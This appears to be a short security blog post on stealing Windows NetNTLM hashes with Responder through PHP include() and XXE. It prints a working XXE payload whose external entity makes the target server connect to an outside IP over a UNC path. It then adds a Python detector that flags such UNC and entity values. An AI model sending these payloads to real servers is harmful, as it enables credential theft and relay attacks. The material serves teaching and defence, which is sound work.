One day @m3g9tr0n and I were discussing different places where we can use Responder to steal NetNTLM hashes. After experimenting, I thought of writing this post along with some cool findings in the world of Windows. SMBRelay attacks are also possible in these scenarios.
The include() function in PHP will resolve the network path for us.
Here I’m using “php://filter/convert.base64-encode/resource=”, which will resolve a network path.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//18.104.22.168/@OsandaMalith" >
]>
<root>
  <name></name>
  <tel></tel>
  <email>OUT&xxe;OUT</email>
  <password></password>
</root>
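On the defensive side, both the include() case and the XXE case above leave the same trace in a request: a value that resolves to a UNC path, either directly or behind a php://filter wrapper. The following is an added example, not code from the original post, of a check that flags such values before they reach PHP; the function names, sample inputs and the documentation address 192.0.2.10 are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# UNC-style path: \\host\share or //host/share (Windows treats both as a network path)
UNC_RE = re.compile(r'^(?:\\\\|//)(?P<host>[^\\/\s]+)(?:[\\/]|$)')
# php://filter/<filters>/resource=<target>
FILTER_RE = re.compile(r'^php://filter/.*?resource=(?P<target>.*)$', re.I | re.S)
# <!ENTITY name SYSTEM "id">, parameter entities, and PUBLIC "pubid" "sysid"
ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?:%\s+)?(?P<name>[^\s%]+)\s+"""
    r"""(?:SYSTEM|PUBLIC\s+["'][^"']*["'])\s+"""
    r"""(?P<q>["'])(?P<sysid>.*?)(?P=q)""",
    re.S)

def unc_host(value):
    """Return the remote host if value (optionally wrapped in php://filter)
    is a UNC path after URL-decoding, else None."""
    v = unquote(value).strip()
    m = FILTER_RE.match(v)
    if m:
        v = m.group('target')
    m = UNC_RE.match(v)
    return m.group('host') if m else None

def scan_xml(body):
    """List (entity_name, host) for external entities pointing at a UNC path."""
    hits = [(m.group('name'), unc_host(m.group('sysid')))
            for m in ENTITY_RE.finditer(body)]
    return [(name, host) for name, host in hits if host]

def scan_params(params):
    """List (param, host) for request parameters whose value is a UNC path."""
    hits = [(key, unc_host(val)) for key, val in params.items()]
    return [(key, host) for key, host in hits if host]

# Constructed sample inputs (not captured traffic)
SAMPLE_XML = """<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ok SYSTEM "http://example.com/ok.dtd">
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//192.0.2.10/@share">
]>
<root><email>&xxe;</email></root>"""
SAMPLE_PARAMS = {"page": "\\\\192.0.2.10\\share", "lang": "en", "tpl": "pages/home.php"}

if __name__ == "__main__":
    print("XML entities:", scan_xml(SAMPLE_XML))
    print("Parameters:  ", scan_params(SAMPLE_PARAMS))
```

A hit here is a reason to reject the request; blocking outbound SMB from the web server remains the control that stops the hash from leaving if a value slips through.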